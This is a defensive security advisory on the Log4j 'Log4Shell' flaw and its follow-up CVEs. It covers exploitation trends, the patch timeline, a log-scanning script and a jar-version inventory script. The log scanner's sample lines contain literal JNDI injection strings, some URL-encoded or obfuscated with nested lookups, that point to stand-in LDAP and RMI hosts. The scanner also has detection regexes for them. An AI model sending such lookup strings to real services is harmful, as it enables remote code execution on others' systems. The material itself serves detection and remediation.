The Situation
A recently disclosed critical vulnerability (CVE-2021-44228) in Apache Log4j 2, a widely used Java logging library, is one of the most serious cyber security vulnerabilities in recent years. Because Log4j is embedded in many applications across many organisations and the vulnerability is easy to exploit, all organisations must act quickly to identify and contain the risk, detect attack attempts and remediate their systems.
Since the disclosure, the vulnerability has been under active exploitation by cyber attackers. Many organisations across various sectors are exposed because the use of Log4j is ubiquitous and the vulnerability is easy to exploit. Financially motivated attackers were among the first to exploit targets, and exploitation attempts are expected to increase and lead to monetisation activity, including data theft and ransomware deployment.
Services and products that rely on the Apache logging framework are working on fixes and are communicating the impact to their customers. At the time of writing, some of these services and applications have been patched or have had workarounds implemented to mitigate the vulnerability.
Attackers are actively scanning the internet for affected systems, and tools have been developed to attempt exploitation automatically. The original exploit abuses Log4j's lookup feature: a crafted string in logged input causes the library to resolve a Java Naming and Directory Interface (JNDI) reference over the Lightweight Directory Access Protocol (LDAP), which lets an attacker load arbitrary Java code on the server and take control of it. Many organisations have already been targeted by activity seeking to exploit the Log4j flaw, and new variations of the original exploit, which was first posted on GitHub, are appearing at a rapid pace.
Malware strains, botnet malware, crypto-mining malware and email-based attacks leveraging the Log4j vulnerability are rampant, and there are reports of increased use of the exploit in ransomware deployment. The first disclosed ransomware, Khonsari, targets Windows systems. TellYouThePass, a largely inactive ransomware family, has been revived following the discovery of the Log4j vulnerability; it has versions that run on either Linux or Windows. At the time of writing there has been no public disclosure of a successful ransomware breach that exploited the Log4j vulnerability. Log4j exploitation attempts have been observed making connections to known malicious Cobalt Strike servers; Cobalt Strike is a popular tool used for malicious hacking, enabling activities such as remote reconnaissance and lateral movement.
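The paragraph above describes the lookup string that triggers the vulnerability. A defender's first detection step is to search web-server and application logs for that indicator, allowing for the URL-encoding and nested-lookup obfuscations that the rapidly appearing variants use. The following scanner is an added example written for this advisory, not Ensign's tooling or any Apache code; the log lines and the host names in them are constructed, and the normalisation rules cover only a few published obfuscation forms, so a miss is not proof of absence.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the advisory or any real system).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [11/Dec/2021:09:15:11 +0000] "GET /login HTTP/1.1" 200 318 "-" "${jndi:ldap://scanner.example.invalid/a}"
10.0.0.9 - - [11/Dec/2021:09:16:40 +0000] "GET /api HTTP/1.1" 404 120 "-" "${${lower:j}${upper:n}di:rmi://x.example.invalid/o}"
10.0.0.3 - - [11/Dec/2021:09:17:05 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"
10.0.0.8 - - [11/Dec/2021:09:18:22 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fevil.example.invalid%2Fx%7D HTTP/1.1" 400 0 "-" "-"
"""

# ${lower:x} / ${upper:x} wrappers resolve to the wrapped text; the case does not matter to Log4j.
CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)
# ${anything:-default} resolves to its default value when the lookup fails, e.g. ${::-j} -> j.
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The indicator we are looking for once the string has been normalised.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text: str) -> str:
    """Undo URL-encoding and the simple nested-lookup tricks until the string stops changing."""
    for _ in range(10):
        new = unquote(text)
        new = CASE_WRAPPER.sub(lambda m: m.group(1).lower(), new)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line whose normalised form contains a JNDI lookup."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        norm = normalize(line)
        if JNDI_LOOKUP.search(norm):
            hits.append({
                "line": line_no,
                "client": line.split(" ", 1)[0],  # first field of the combined log format
                "normalized": norm,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']}: {hit['normalized']}")
```

Run it over real access logs by reading the file into `scan_log`; the `client` field is the pivot for blocking and for correlating with outbound LDAP or RMI connections from the affected host, which is the stronger signal that an attempt actually succeeded.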
Apache first attempted to address the vulnerability with the release of log4j 2.15.0 on 10 Dec. However, that fix was incomplete in certain non-default configurations. Apache then urgently released log4j 2.16.0 (https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0), which removes support for message lookup patterns and disables the JNDI functionality by default. This release also resolved a second disclosed vulnerability of lower severity, CVE-2021-45046 (Thread Context Message Pattern and Context Lookup Pattern vulnerable to DoS).
On 18 Dec, log4j 2.17.0 (Java 8 and later) (https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.0) was rolled out. It resolved a denial-of-service (DoS) vulnerability (CVE-2021-45105) that could be triggered when a non-default Pattern Layout with a Context Lookup was used in the logging configuration.
On 27 Dec, log4j 2.17.1 (Java 8 and later) (https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1) was rolled out. It resolved a remote code execution (RCE) vulnerability (CVE-2021-44832), rated 'Moderate' in severity with a CVSS score of 6.6, by limiting JNDI data source names to the java protocol.
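The three paragraphs above give a release timeline in which each version closes one more CVE, so identifying the exact log4j-core version on disk tells you which issues remain open. The scanner below is an added example written for this advisory (not Ensign's tooling and not an Apache utility); it reads the Maven `pom.properties` that log4j-core jars carry, also looks for the `JndiLookup` class, and recurses into jars nested inside wars and ears. The sample archives it builds are constructed stand-ins with only the entries the scanner reads, and a jar whose version cannot be read is treated as fully vulnerable.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear")

# Release timeline as stated in the advisory: (first version that closed it, CVE).
FIX_TIMELINE: List[Tuple[Tuple[int, int, int], str]] = [
    ((2, 15, 0), "CVE-2021-44228"),
    ((2, 16, 0), "CVE-2021-45046"),
    ((2, 17, 0), "CVE-2021-45105"),
    ((2, 17, 1), "CVE-2021-44832"),
]


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); None when the string has no x.y.z version."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def outstanding_cves(version: Optional[Tuple[int, int, int]]) -> List[str]:
    """CVEs from the timeline not yet fixed in this version; unknown version counts as all of them."""
    if version is None:
        return [cve for _, cve in FIX_TIMELINE]
    return [cve for fixed_in, cve in FIX_TIMELINE if version < fixed_in]


def scan_archive(data: bytes, name: str, depth: int = 0) -> List[Dict[str, object]]:
    """Inspect one archive held in memory and any jar/war/ear nested inside it."""
    findings: List[Dict[str, object]] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_LOOKUP in names:
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = parse_version(line.split("=", 1)[1])
            findings.append({
                "archive": name,
                "version": version,
                "jndi_lookup_present": JNDI_LOOKUP in names,
                "outstanding": outstanding_cves(version),
            })
        if depth < 3:  # bounded recursion into shaded or bundled archives
            for entry in sorted(names):
                if entry.lower().endswith(NESTED):
                    findings.extend(scan_archive(zf.read(entry), f"{name}!{entry}", depth + 1))
    return findings


def scan_directory(root: Path) -> List[Dict[str, object]]:
    """Walk a directory tree and report every log4j-core found, including nested copies."""
    findings: List[Dict[str, object]] = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in NESTED:
            findings.extend(scan_archive(path.read_bytes(), str(path)))
    return findings


def build_sample_jar(version: str, include_jndi_lookup: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar; only the entries the scanner reads are present."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()


def build_sample_war(inner_jar: bytes) -> bytes:
    """Constructed web archive that bundles the given jar under WEB-INF/lib."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner_jar)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    for finding in scan_directory(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print(finding)
```

Point `scan_directory` at application and container image roots; a finding with an empty `outstanding` list is at 2.17.1 or later per this timeline, while anything with CVE-2021-44228 still listed is the priority for the remediation steps in the recommendations below. Version checks are an inventory aid only: vendor-patched builds may carry non-standard version strings, which is why the unknown case is reported rather than skipped.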
Ensign Posture & Monitoring
The vulnerability does not affect Ensign’s infrastructure.
Ensign has stepped up monitoring operations as part of ongoing vigilance and will advise clients of any anomalous cyber activities detected.
Our Recommendations
While many vulnerable services and products are still working on a fix, there are some proactive steps you can take:
[Identify]
[Contain]
[Detect]
[Tactical Remediation]
[Related software and vendor bulletins]
Ensign will continue to provide updates on this vulnerability, and keep you informed of any additional recommendations. If you require further assistance, please contact us at marketing@ensigninfosecurity.com.
References
https://logging.apache.org/log4j/2.x/security.html
https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/
https://threatpost.com/log4j-attacks-state-actors-worm/177088/
https://blog.sygnia.co/log4shell-remote-code-execution-advisory
https://www.mandiant.com/resources/log4shell-recommendations